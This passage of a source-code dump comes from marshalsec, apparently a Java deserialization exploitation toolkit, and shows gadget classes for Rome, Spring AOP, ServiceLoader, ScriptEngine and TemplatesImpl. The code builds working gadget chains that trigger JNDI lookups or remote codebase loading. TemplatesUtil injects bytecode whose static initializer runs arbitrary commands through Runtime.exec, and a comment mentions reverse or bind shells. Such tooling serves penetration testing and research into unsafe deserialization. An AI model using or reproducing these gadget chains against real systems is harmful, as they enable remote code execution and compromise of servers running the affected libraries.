Constructor ccCons = ccCl.getDeclaredConstructor(CannotProceedException.class, Hashtable.class); 55 | ccCons.setAccessible(true); 56 | CannotProceedException cpe = new CannotProceedException(); 57 | Reflections.setFieldValue(cpe, "cause", null); 58 | Reflections.setFieldValue(cpe, "stackTrace", null); 59 | 60 | cpe.setResolvedObj(new Reference("Foo", args[ 1 ], args[ 0 ])); 61 | 62 | Reflections.setFieldValue(cpe, "suppressedExceptions", null); 63 | DirContext ctx = (DirContext) ccCons.newInstance(cpe, new Hashtable<>()); 64 | QName qName = new QName(ctx, "foo", "bar"); 65 | return uf.makeToStringTriggerStable(qName); 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/ResourceGadget.java: -------------------------------------------------------------------------------- 1 | package marshalsec.gadgets; 2 | 3 | import marshalsec.MarshallerBase; 4 | import marshalsec.UtilFactory; 5 | 6 | public interface ResourceGadget extends Gadget{ 7 | @Args ( minArgs = 1, args = { 8 | "codebase" 9 | }, defaultArgs = { 10 | MarshallerBase.defaultCodebase 11 | } ) 12 | Object makeResource (UtilFactory uf, String[] args ) throws Exception; 13 | } 14 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Rome.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import com.rometools.rome.feed.impl.EqualsBean; 27 | import com.rometools.rome.feed.impl.ToStringBean; 28 | import com.sun.rowset.JdbcRowSetImpl; 29 | 30 | import marshalsec.MarshallerBase; 31 | import marshalsec.UtilFactory; 32 | 33 | 34 | /** 35 | * @author mbechler 36 | * 37 | */ 38 | public interface Rome extends Gadget { 39 | 40 | @Primary 41 | @Args ( minArgs = 1, args = { 42 | "jndiUrl" 43 | }, defaultArgs = { 44 | MarshallerBase.defaultJNDIUrl 45 | } ) 46 | default Object makeRome ( UtilFactory uf, String[] args ) throws Exception { 47 | return makeROMEAllPropertyTrigger(uf, JdbcRowSetImpl.class, JDKUtil.makeJNDIRowSet(args[ 0 ])); 48 | } 49 | 50 | 51 | default Object makeROMEAllPropertyTrigger ( UtilFactory uf, Class type, T obj ) throws Exception { 52 | ToStringBean item = new ToStringBean(type, obj); 53 | EqualsBean root = new EqualsBean(ToStringBean.class, item); 54 | return uf.makeHashCodeTrigger(root); 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/ScriptEngine.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.MarshallerBase; 27 | import marshalsec.UtilFactory; 28 | 29 | 30 | /** 31 | * @author mbechler 32 | * 33 | */ 34 | public interface ScriptEngine extends Gadget { 35 | 36 | @Args ( minArgs = 1, args = { 37 | "codebase" 38 | }, defaultArgs = { 39 | MarshallerBase.defaultCodebase 40 | } ) 41 | // is triggered through constructor call, therefor cannot be represented by an object instance 42 | Object makeScriptEngine ( UtilFactory uf, String[] args ) throws Exception; 43 | } 44 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/ServiceLoader.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import javax.script.ScriptEngineFactory; 27 | 28 | import marshalsec.MarshallerBase; 29 | import marshalsec.UtilFactory; 30 | 31 | 32 | /** 33 | * 34 | * @author mbechler 35 | * 36 | */ 37 | public interface ServiceLoader extends Gadget { 38 | 39 | @Args ( minArgs = 1, args = { 40 | "service_codebase" 41 | }, defaultArgs = { 42 | MarshallerBase.defaultCodebase 43 | } ) 44 | // uses the ScriptEngineFactory service 45 | default Object makeServiceLoader ( UtilFactory uf, String[] args ) throws Exception { 46 | return uf.makeIteratorTrigger(JDKUtil.makeServiceIterator(JDKUtil.makeURLClassLoader(args[ 0 ]), ScriptEngineFactory.class)); 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/SpringAbstractBeanFactoryPointcutAdvisor.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.MarshallerBase; 27 | import marshalsec.UtilFactory; 28 | 29 | 30 | /** 31 | * @author mbechler 32 | * 33 | */ 34 | public interface SpringAbstractBeanFactoryPointcutAdvisor extends Gadget { 35 | 36 | @Primary 37 | @Args ( minArgs = 1, args = { 38 | "jndiUrl" 39 | }, defaultArgs = { 40 | MarshallerBase.defaultJNDIUrl 41 | } ) 42 | default Object makeBeanFactoryPointcutAdvisor ( UtilFactory uf, String[] args ) throws Exception { 43 | String jndiUrl = args[ 0 ]; 44 | return SpringUtil.makeBeanFactoryTriggerBFPA(uf, jndiUrl, SpringUtil.makeJNDITrigger(jndiUrl)); 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/SpringPartiallyComparableAdvisorHolder.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import org.springframework.beans.factory.BeanFactory; 27 | 28 | import marshalsec.MarshallerBase; 29 | import marshalsec.UtilFactory; 30 | 31 | 32 | /** 33 | * @author mbechler 34 | * 35 | */ 36 | public interface SpringPartiallyComparableAdvisorHolder extends Gadget { 37 | 38 | @Primary 39 | @Args ( minArgs = 1, args = { 40 | "jndiUrl" 41 | }, defaultArgs = { 42 | MarshallerBase.defaultJNDIUrl 43 | } ) 44 | default Object makePartiallyComparableAdvisorHolder ( UtilFactory uf, String[] args ) throws Exception { 45 | String jndiUrl = args[ 0 ]; 46 | BeanFactory bf = SpringUtil.makeJNDITrigger(jndiUrl); 47 | return SpringUtil.makeBeanFactoryTriggerPCAH(uf, jndiUrl, bf); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/SpringPropertyPathFactory.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import org.springframework.beans.factory.BeanFactory; 27 | import org.springframework.beans.factory.config.PropertyPathFactoryBean; 28 | 29 | import marshalsec.MarshallerBase; 30 | import marshalsec.UtilFactory; 31 | import marshalsec.util.Reflections; 32 | 33 | 34 | /** 35 | * @author mbechler 36 | * 37 | */ 38 | public interface SpringPropertyPathFactory extends Gadget { 39 | 40 | @Primary 41 | @Args ( minArgs = 1, args = { 42 | "jndiUrl" 43 | }, defaultArgs = { 44 | MarshallerBase.defaultJNDIUrl 45 | } ) 46 | default Object makePropertyPathFactory ( UtilFactory uf, String[] args ) throws Exception { 47 | String jndiUrl = args[ 0 ]; 48 | BeanFactory bf = SpringUtil.makeJNDITrigger(jndiUrl); 49 | 50 | PropertyPathFactoryBean ppf = new PropertyPathFactoryBean(); 51 | ppf.setTargetBeanName(jndiUrl); 52 | ppf.setPropertyPath("foo"); 53 | 54 | Reflections.setFieldValue(ppf, "beanFactory", bf); 55 | return ppf; 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/SpringUtil.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.reflect.InvocationTargetException; 27 | import java.util.HashSet; 28 | import java.util.Map; 29 | 30 | import org.apache.commons.logging.impl.NoOpLog; 31 | import org.springframework.aop.aspectj.AbstractAspectJAdvice; 32 | import org.springframework.aop.aspectj.AspectInstanceFactory; 33 | import org.springframework.aop.aspectj.AspectJAroundAdvice; 34 | import org.springframework.aop.aspectj.AspectJPointcutAdvisor; 35 | import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory; 36 | import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor; 37 | import org.springframework.beans.factory.BeanFactory; 38 | import org.springframework.beans.factory.support.DefaultListableBeanFactory; 39 | import org.springframework.beans.factory.support.RootBeanDefinition; 40 | import org.springframework.jndi.support.SimpleJndiBeanFactory; 41 | 42 | import marshalsec.UtilFactory; 43 | import marshalsec.util.Reflections; 44 | 45 | 46 | /** 47 | * @author mbechler 48 | * 49 | */ 50 | public final class SpringUtil { 51 | 52 | /** 53 | * 54 | */ 55 | private SpringUtil () {} 56 | 57 | 58 | public static BeanFactory makeJNDITrigger ( String jndiUrl ) throws Exception { 59 | SimpleJndiBeanFactory bf = new SimpleJndiBeanFactory(); 60 | bf.setShareableResources(jndiUrl); 61 | Reflections.setFieldValue(bf, "logger", new NoOpLog()); 62 | Reflections.setFieldValue(bf.getJndiTemplate(), "logger", new NoOpLog()); 63 | return bf; 64 | } 65 | 66 | 67 | public static BeanFactory makeMethodTrigger ( Object o, String method ) throws Exception { 68 | DefaultListableBeanFactory bf = new DefaultListableBeanFactory(); 69 | RootBeanDefinition caller = new RootBeanDefinition(); 70 | 71 | caller.setFactoryBeanName("obj"); 72 | caller.setFactoryMethodName(method); 73 | Reflections.setFieldValue(caller.getMethodOverrides(), "overrides", new HashSet<>()); 74 | bf.registerBeanDefinition("caller", caller); 75 | 76 | Reflections.getField(DefaultListableBeanFactory.class, "beanClassLoader").set(bf, null); 77 | Reflections.getField(DefaultListableBeanFactory.class, "alreadyCreated").set(bf, new HashSet<>()); 78 | Reflections.getField(DefaultListableBeanFactory.class, "singletonsCurrentlyInCreation").set(bf, new HashSet<>()); 79 | Reflections.getField(DefaultListableBeanFactory.class, "inCreationCheckExclusions").set(bf, new HashSet<>()); 80 | Reflections.getField(DefaultListableBeanFactory.class, "logger").set(bf, new NoOpLog()); 81 | Reflections.getField(DefaultListableBeanFactory.class, "prototypesCurrentlyInCreation").set(bf, new ThreadLocal<>()); 82 | 83 | @SuppressWarnings ( "unchecked" ) 84 | Map objs = (Map) Reflections.getFieldValue(bf, "singletonObjects"); 85 | objs.put("obj", o); 86 | return bf; 87 | } 88 | 89 | 90 | public static Object makeBeanFactoryTriggerBFPA ( UtilFactory uf, String name, BeanFactory bf ) throws Exception { 91 | DefaultBeanFactoryPointcutAdvisor pcadv = new DefaultBeanFactoryPointcutAdvisor(); 92 | pcadv.setBeanFactory(bf); 93 | pcadv.setAdviceBeanName(name); 94 | return uf.makeEqualsTrigger(pcadv, new DefaultBeanFactoryPointcutAdvisor()); 95 | } 96 | 97 | 98 | /** 99 | * @param jndiUrl 100 | * @param bf 101 | * @return 102 | * @throws ClassNotFoundException 103 | * @throws NoSuchMethodException 104 | * @throws InstantiationException 105 | * @throws IllegalAccessException 106 | * @throws InvocationTargetException 107 | * @throws Exception 108 | */ 109 | public static Object makeBeanFactoryTriggerPCAH ( UtilFactory uf, String name, BeanFactory bf ) throws ClassNotFoundException, 110 | NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException, Exception { 111 | AspectInstanceFactory aif = Reflections.createWithoutConstructor(BeanFactoryAspectInstanceFactory.class); 112 | Reflections.setFieldValue(aif, "beanFactory", bf); 113 | Reflections.setFieldValue(aif, "name", name); 114 | AbstractAspectJAdvice advice = Reflections.createWithoutConstructor(AspectJAroundAdvice.class); 115 | Reflections.setFieldValue(advice, "aspectInstanceFactory", aif); 116 | 117 | // make readObject happy if it is called 118 | Reflections.setFieldValue(advice, "declaringClass", Object.class); 119 | Reflections.setFieldValue(advice, "methodName", "toString"); 120 | Reflections.setFieldValue(advice, "parameterTypes", new Class[0]); 121 | 122 | AspectJPointcutAdvisor advisor = Reflections.createWithoutConstructor(AspectJPointcutAdvisor.class); 123 | Reflections.setFieldValue(advisor, "advice", advice); 124 | 125 | Class pcahCl = Class 126 | .forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder"); 127 | Object pcah = Reflections.createWithoutConstructor(pcahCl); 128 | Reflections.setFieldValue(pcah, "advisor", advisor); 129 | return uf.makeToStringTriggerUnstable(pcah); 130 | } 131 | } 132 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/Templates.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import marshalsec.UtilFactory; 27 | 28 | 29 | /** 30 | * @author mbechler 31 | * 32 | */ 33 | public interface Templates extends Gadget { 34 | 35 | @Primary 36 | Object makeTemplates ( UtilFactory uf, String... args ) throws Exception; 37 | } 38 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/TemplatesUtil.java: -------------------------------------------------------------------------------- 1 | package marshalsec.gadgets; 2 | 3 | 4 | import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; 5 | 6 | import java.io.Serializable; 7 | 8 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 9 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 10 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 11 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 12 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 13 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 14 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 15 | 16 | import javassist.ClassClassPath; 17 | import javassist.ClassPool; 18 | import javassist.CtClass; 19 | import marshalsec.util.Reflections; 20 | 21 | 22 | /* 23 | * utility generator functions for common jdk-only gadgets 24 | */ 25 | @SuppressWarnings ( { 26 | "restriction" 27 | } ) 28 | public class TemplatesUtil { 29 | 30 | static { 31 | // special case for using TemplatesImpl gadgets with a SecurityManager enabled 32 | System.setProperty(DESERIALIZE_TRANSLET, "true"); 33 | 34 | // for RMI remote loading 35 | System.setProperty("java.rmi.server.useCodebaseOnly", "false"); 36 | } 37 | 38 | public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; 39 | 40 | public static class StubTransletPayload extends AbstractTranslet implements Serializable { 41 | 42 | private static final long serialVersionUID = -5971610431559700674L; 43 | 44 | 45 | @Override 46 | public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {} 47 | 48 | 49 | @Override 50 | public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} 51 | } 52 | 53 | // required to make TemplatesImpl happy 54 | public static class Foo implements Serializable { 55 | 56 | private static final long serialVersionUID = 8207363842866235160L; 57 | } 58 | 59 | 60 | public static Object createTemplatesImpl ( final String[] args ) throws Exception { 61 | if ( Boolean.parseBoolean(System.getProperty("upstreamXalan", "false")) ) { 62 | return createTemplatesImpl( 63 | args, 64 | Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), 65 | Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), 66 | Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); 67 | } 68 | 69 | return createTemplatesImpl(args, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); 70 | } 71 | 72 | 73 | public static T createTemplatesImpl ( final String[] args, Class tplClass, Class abstTranslet, Class transFactory ) 74 | throws Exception { 75 | final T templates = tplClass.newInstance(); 76 | 77 | // use template gadget class 78 | ClassPool pool = ClassPool.getDefault(); 79 | pool.insertClassPath(new ClassClassPath(StubTransletPayload.class)); 80 | pool.insertClassPath(new ClassClassPath(abstTranslet)); 81 | final CtClass clazz = pool.get(StubTransletPayload.class.getName()); 82 | // run command in static initializer 83 | // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections 84 | 85 | StringBuilder sb = new StringBuilder(); 86 | boolean first = true; 87 | for ( String arg : args ) { 88 | 89 | if ( !first ) { 90 | sb.append(','); 91 | } 92 | else { 93 | first = false; 94 | } 95 | 96 | sb.append('"'); 97 | sb.append(arg.replaceAll("\"", "\\\"")); 98 | sb.append('"'); 99 | } 100 | 101 | clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(new String[] { " + sb.toString() + " });"); 102 | // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) 103 | clazz.setName("ysoserial.Pwner" + System.nanoTime()); 104 | CtClass superC = pool.get(abstTranslet.getName()); 105 | clazz.setSuperclass(superC); 106 | 107 | final byte[] classBytes = clazz.toBytecode(); 108 | 109 | // inject class bytes into instance 110 | Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { 111 | classBytes, ClassFiles.classAsBytes(Foo.class) 112 | }); 113 | 114 | // required to make TemplatesImpl happy 115 | Reflections.setFieldValue(templates, "_name", "Pwnr"); 116 | Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance()); 117 | return templates; 118 | } 119 | } 120 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/ToStringUtil.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec.gadgets; 24 | 25 | 26 | import java.lang.reflect.Constructor; 27 | import java.util.Arrays; 28 | import java.util.HashMap; 29 | import java.util.Map; 30 | import java.util.function.Function; 31 | 32 | import org.springframework.aop.target.HotSwappableTargetSource; 33 | 34 | import com.sun.org.apache.xpath.internal.objects.XString; 35 | 36 | 37 | /** 38 | * @author mbechler 39 | * 40 | */ 41 | public class ToStringUtil { 42 | 43 | public static Object makeToStringTrigger ( Object o, Function wrap ) throws Exception { 44 | String unhash = unhash(o.hashCode()); 45 | XString xString = new XString(unhash); 46 | return JDKUtil.makeMap(wrap.apply(o), wrap.apply(xString)); 47 | } 48 | 49 | 50 | public static Object makeToStringTrigger ( Object o ) throws Exception { 51 | String unhash = unhash(o.hashCode()); 52 | XString xString = new XString(unhash); 53 | return JDKUtil.makeMap(o, xString); 54 | } 55 | 56 | 57 | public static Object makeJohnzonToStringTrigger ( Object o ) throws Exception { 58 | Class clz = Class.forName("org.apache.johnzon.core.JsonObjectImpl"); //$NON-NLS-1$ 59 | Constructor dec = clz.getDeclaredConstructor(Map.class); 60 | dec.setAccessible(true); 61 | HashMap m = new HashMap<>(); 62 | Object jo = dec.newInstance(m); 63 | m.put(o, o); 64 | XString toStringTrig = new XString(""); 65 | return Arrays.asList(jo, JDKUtil.makeMap(jo, toStringTrig)); 66 | } 67 | 68 | 69 | public static Object makeSpringAOPToStringTrigger ( Object o ) throws Exception { 70 | return makeToStringTrigger(o, x -> { 71 | return new HotSwappableTargetSource(x); 72 | }); 73 | } 74 | 75 | 76 | public static String unhash ( int hash ) { 77 | int target = hash; 78 | StringBuilder answer = new StringBuilder(); 79 | if ( target < 0 ) { 80 | // String with hash of Integer.MIN_VALUE, 0x80000000 81 | answer.append("\\u0915\\u0009\\u001e\\u000c\\u0002"); 82 | 83 | if ( target == Integer.MIN_VALUE ) 84 | return answer.toString(); 85 | // Find target without sign bit set 86 | target = target & Integer.MAX_VALUE; 87 | } 88 | 89 | unhash0(answer, target); 90 | return answer.toString(); 91 | } 92 | 93 | 94 | private static void unhash0 ( StringBuilder partial, int target ) { 95 | int div = target / 31; 96 | int rem = target % 31; 97 | 98 | if ( div <= Character.MAX_VALUE ) { 99 | if ( div != 0 ) 100 | partial.append((char) div); 101 | partial.append((char) rem); 102 | } 103 | else { 104 | unhash0(partial, div); 105 | partial.append((char) rem); 106 | } 107 | } 108 | 109 | } 110 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/gadgets/UnicastRefGadget.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, 